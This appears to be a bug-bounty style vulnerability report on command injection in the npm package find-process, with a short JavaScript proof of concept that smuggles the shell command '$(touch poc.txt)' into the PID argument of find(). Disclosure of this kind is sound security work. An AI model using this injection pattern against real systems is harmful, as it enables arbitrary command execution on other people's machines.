Command Injection in yibn2008/find-process


Reported on

Mar 17th 2021

✍️ Description

find-process is vulnerable to Command Injection through the find function. This function is capable to get information about running processes by PID number, port number or a string value.

🕵️‍♂️ Proof of Concept

// PoC.js

const find = require('find-process');
const command = "$(touch poc.txt)";

find('pid', command)
  .then(function (list) {
  }, function (err) {
    console.log(err.stack || err);

The execution of the code above implies the creation of poc.txt file.

💥 Impact

This vulnerability allows attackers to execute arbitrary OS commands.

to join this conversation